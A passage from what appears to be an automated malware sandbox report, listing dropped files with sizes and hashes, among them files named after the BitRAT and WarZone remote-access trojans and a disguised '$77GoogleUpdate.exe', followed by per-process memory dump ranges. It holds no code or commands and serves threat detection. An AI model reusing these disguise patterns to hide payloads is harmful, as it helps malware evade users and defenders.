                        e86ac9ab83476e200dc92c3be9d7b9a6792bce9b

                        SHA256

                        9bae3230b64b785583cc1dea8dd37e27fafa9c049d51192c2e7e02cbd417488c

                        SHA512

                        a0203cfc02e2a2bb9003b7f1be5e92c72d5dada4867f2209d311270541a78b0f2653e15a692ceb235d5d2846a3d5452c4dcb0e77ac7dafcc0ad1b6da3a9259ee

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        15KB

                        MD5

                        6347b5bfbd2371b20a3c0452e4030638

                        SHA1

                        ada85fe3166c6d12a8cf4358d944637aeeaad4ee

                        SHA256

                        02250982f5f910704a7c1bea8cf81bda3194dfa8aefccba1c650a72288e64ec4

                        SHA512

                        b98b4b6e9e2e0848a09b7b24ecd9fb58febcb52d04ba62eccac4ad645466c5aa550b4691b2db8fb2749d7887f30ec5a35fc64c94172f6fb896fc55ca0e86368a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        19KB

                        MD5

                        cd207fca512b968e839518ad19ec724c

                        SHA1

                        4b8ce07ccbaf935f8c6378ef49bef65158cd99ec

                        SHA256

                        80cf8c8c54d4c4625614e3db5d9a0c66cacd15565aba698aec303ca7e1c0405d

                        SHA512

                        271af571ae4dd0a090213d38538bfd2749248395a99ed8a1ec598a488cda27988d2e84e2ab7514e3a905957e36cdad69d9a7f27e15864abb7a4cc98b21f28ba3

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        18KB

                        MD5

                        4b2ed10cbd2d58dbbf3c50a155c3e34d

                        SHA1

                        aabe7337b4253830afdf97f24a71773c7c236c6e

                        SHA256

                        5cb15d10fcd38f7f09e0a496169f451bf403d356cff9ac026a22691134ce8d4a

                        SHA512

                        bd99e9dc58099d290cf7b4ed9a54038e254087459ec302b85a9dac517c10670cc383952284210c20ef4daa182bc4d8a85fcb86cd744df5e85657f120a3bb589a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
                        Filesize

                        3.8MB

                        MD5

                        ca607a7fb0fa99f0ef20300deea83d55

                        SHA1

                        f6348167625781bb441dfcbb49f8e65c62144adf

                        SHA256

                        612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36

                        SHA512

                        ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
                        Filesize

                        3.8MB

                        MD5

                        ca607a7fb0fa99f0ef20300deea83d55

                        SHA1

                        f6348167625781bb441dfcbb49f8e65c62144adf

                        SHA256

                        612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36

                        SHA512

                        ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
                        Filesize

                        4.3MB

                        MD5

                        f8169767c726f1be7a7e14839cc44d36

                        SHA1

                        571bcdb58a2017d77593ea1325bac737160b81f4

                        SHA256

                        1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377

                        SHA512

                        c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
                        Filesize

                        4.3MB

                        MD5

                        f8169767c726f1be7a7e14839cc44d36

                        SHA1

                        571bcdb58a2017d77593ea1325bac737160b81f4

                        SHA256

                        1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377

                        SHA512

                        c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77Install.exe
                        Filesize

                        162KB

                        MD5

                        2656bb680bc4b4a95ce5cb1443b2850d

                        SHA1

                        3033d5adc32e3df44205408dd3689670756e55a4

                        SHA256

                        68755b0a7b376687d2202dc117b78a5142ca2ec14d14f3c20890b93bf8ed221c

                        SHA512

                        59e4706033b565754f67620a5cb7057c79507ce681852a26e7de5bec7c6d58b87b5c6766db588dbbf6d7581ba6efb85019298308cadc9e2f85471e722dd0ed76

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
                        Filesize

                        152KB

                        MD5

                        48092158c6601dba353421f70d501025

                        SHA1

                        01d0d5149e9b690a84554fb4ac72fdbdad6d56d2

                        SHA256

                        9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405

                        SHA512

                        b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
                        Filesize

                        152KB

                        MD5

                        48092158c6601dba353421f70d501025

                        SHA1

                        01d0d5149e9b690a84554fb4ac72fdbdad6d56d2

                        SHA256

                        9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405

                        SHA512

                        b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
                        Filesize

                        494KB

                        MD5

                        eb51a99599683b7b3d47981722da5218

                        SHA1

                        e693b669e2c309869ce31f13661ba6eb3d3b0566

                        SHA256

                        9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38

                        SHA512

                        6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\$77icaro.exe
                        Filesize

                        494KB

                        MD5

                        eb51a99599683b7b3d47981722da5218

                        SHA1

                        e693b669e2c309869ce31f13661ba6eb3d3b0566

                        SHA256

                        9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38

                        SHA512

                        6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                        Filesize

                        4KB

                        MD5

                        1644f12dc1fdf3e3505fd85cc7ee2bfb

                        SHA1

                        5e5682d54ddda2f66b0bdbaf60dc90e3209cd132

                        SHA256

                        a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7

                        SHA512

                        1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
                        Filesize

                        4KB

                        MD5

                        1644f12dc1fdf3e3505fd85cc7ee2bfb

                        SHA1

                        5e5682d54ddda2f66b0bdbaf60dc90e3209cd132

                        SHA256

                        a831b9f4d11bb5624c7087006a0e8097774a3ccbe3afd812d0082b8e8eaa4cf7

                        SHA512

                        1177b7f628238a5db0e9190abd0bc2295bb147212dfe3d1899f800c88245260a0318e5b471c00466ec1ce71b2d311411d26f0212101a12be3253d3e4c22847be

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RESECD6.tmp
                        Filesize

                        1KB

                        MD5

                        bdb285fbac36bb8dbf9bae08e3ca29f9

                        SHA1

                        e9f9876f8e153eebef538ec82f62ed1cad2828c6

                        SHA256

                        bf18a49ec16c2340aa77dde24e050173bb15854c4dc04fa3fc2ce7ee3a30ed1a

                        SHA512

                        e56e0e1a23915a7e4f87b61f143bd66bc479078b7505bed9e8e25f27a3872c9ff6e7defd5ec9902f243194214c205c9a606b0f263c29066534efb90bf151b052

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\CSC7FCCC60AE1614FD7B713EA441ED24B43.TMP
                        Filesize

                        1KB

                        MD5

                        8bbf0aca651a891e81c9323a8af372ee

                        SHA1

                        c6ff718e14da6eb73d2733b41c0a95df9a23fc45

                        SHA256

                        9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2

                        SHA512

                        e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.0.cs
                        Filesize

                        1KB

                        MD5

                        b3a0e87506914a518a26de26cc397a0b

                        SHA1

                        822bf87c58c6a2dcc72689be4a1c9869f4ffabb3

                        SHA256

                        5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110

                        SHA512

                        77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\n42f4axy\n42f4axy.cmdline
                        Filesize

                        450B

                        MD5

                        f4e02ad531227dfde2db9e6da710c2a2

                        SHA1

                        5d4e598721c989be975022060a01eef1992da72d

                        SHA256

                        6c4827996d73b0188f15ce978098ec336daab436babc02fcf1c1ff284fbe25a7

                        SHA512

                        2ee6a97c948b631919a7ea65641755563b5aea426d574f166c8e1e1d7e9b07e706f9bb9898749afd8f8b9f4fbc9d100fb690ebdc6f54bcbf1511ba5747138440

                        Download Submit

                      • memory/408-255-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/620-254-0x00007FFF1A650000-0x00007FFF1A660000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/1124-233-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1124-221-0x0000021DDF910000-0x0000021DDF930000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/1124-232-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1124-231-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1124-234-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1124-235-0x0000021DE200C000-0x0000021DE2010000-memory.dmp

                        Filesize

                        16KB

                        Download

                      • memory/1124-237-0x0000021DDEB50000-0x0000021DDEC50000-memory.dmp

                        Filesize

                        1024KB

                        Download

                      • memory/1436-218-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/1472-208-0x0000000000910000-0x0000000000911000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2264-210-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/2416-145-0x0000000000400000-0x0000000000CD5000-memory.dmp

                        Filesize

                        8.8MB

                        Download

                      • memory/2416-143-0x0000000000400000-0x0000000000CD5000-memory.dmp

                        Filesize

                        8.8MB

                        Download

                      • memory/2504-252-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

                        Filesize

                        2.0MB

                        Download

                      • memory/2504-248-0x0000000140000000-0x000000014002B000-memory.dmp

                        Filesize

                        172KB

                        Download

                      • memory/2504-251-0x0000000140000000-0x000000014002B000-memory.dmp

                        Filesize

                        172KB

                        Download

                      • memory/2504-253-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

                        Filesize

                        760KB

                        Download

                      • memory/3772-159-0x0000000000400000-0x00000000007CE000-memory.dmp

                        Filesize

                        3.8MB

                        Download

                      • memory/3772-245-0x0000000070210000-0x0000000070249000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3772-189-0x000000006FEE0000-0x000000006FF19000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3772-240-0x000000006E8D0000-0x000000006E909000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3772-243-0x0000000070210000-0x0000000070249000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3772-206-0x000000006EA90000-0x000000006EAC9000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3772-190-0x000000006F810000-0x000000006F849000-memory.dmp

                        Filesize

                        228KB

                        Download

                      • memory/3860-195-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/4092-241-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4092-247-0x00007FFF5A4D0000-0x00007FFF5A58E000-memory.dmp

                        Filesize

                        760KB

                        Download

                      • memory/4092-246-0x00007FFF5A5D0000-0x00007FFF5A7C5000-memory.dmp

                        Filesize

                        2.0MB

                        Download

                      • memory/4092-244-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4092-242-0x0000017BC64C0000-0x0000017BC64E2000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/4260-179-0x0000000005020000-0x00000000050BC000-memory.dmp

                        Filesize

                        624KB

                        Download

                      • memory/4260-178-0x0000000004E30000-0x0000000004EC2000-memory.dmp

                        Filesize

                        584KB

                        Download

                      • memory/4260-172-0x0000000000400000-0x0000000000424000-memory.dmp

                        Filesize

                        144KB

                        Download

                      • memory/4432-163-0x0000000000FB0000-0x0000000001032000-memory.dmp

                        Filesize

                        520KB

                        Download

                      • memory/4432-166-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4432-184-0x00007FFF3BA70000-0x00007FFF3C531000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4668-199-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4668-220-0x00007FFF3B2D0000-0x00007FFF3BD91000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/4668-198-0x0000000000C20000-0x0000000000C28000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/4924-180-0x00000000080F0000-0x000000000876A000-memory.dmp

                        Filesize

                        6.5MB

                        Download

                      • memory/4924-205-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

                        Filesize

                        56KB

                        Download

                      • memory/4924-228-0x0000000007E40000-0x0000000007E62000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/4924-174-0x0000000006D60000-0x0000000006D92000-memory.dmp

                        Filesize

                        200KB

                        Download

                      • memory/4924-146-0x00000000066A0000-0x00000000066BE000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/4924-176-0x000000006FDE0000-0x000000006FE2C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/4924-177-0x0000000006D40000-0x0000000006D5E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/4924-209-0x0000000007DD0000-0x0000000007DD8000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/4924-207-0x0000000007DF0000-0x0000000007E0A000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/4924-137-0x00000000051E0000-0x0000000005216000-memory.dmp

                        Filesize

                        216KB

                        Download

                      • memory/4924-181-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/4924-188-0x0000000007B20000-0x0000000007B2A000-memory.dmp

                        Filesize

                        40KB

                        Download

                      • memory/4924-193-0x0000000007D30000-0x0000000007DC6000-memory.dmp

                        Filesize

                        600KB

                        Download

                      • memory/4924-141-0x00000000061B0000-0x0000000006216000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/4924-140-0x00000000060D0000-0x0000000006136000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/4924-139-0x0000000005850000-0x0000000005872000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/4924-138-0x0000000005930000-0x0000000005F58000-memory.dmp

                        Filesize

                        6.2MB

                        Download

                      • memory/5036-132-0x00000000001B0000-0x0000000000A8C000-memory.dmp

                        Filesize

                        8.9MB

                        Download

                      • memory/5036-133-0x00000000057F0000-0x0000000005D94000-memory.dmp

                        Filesize

                        5.6MB

                        Download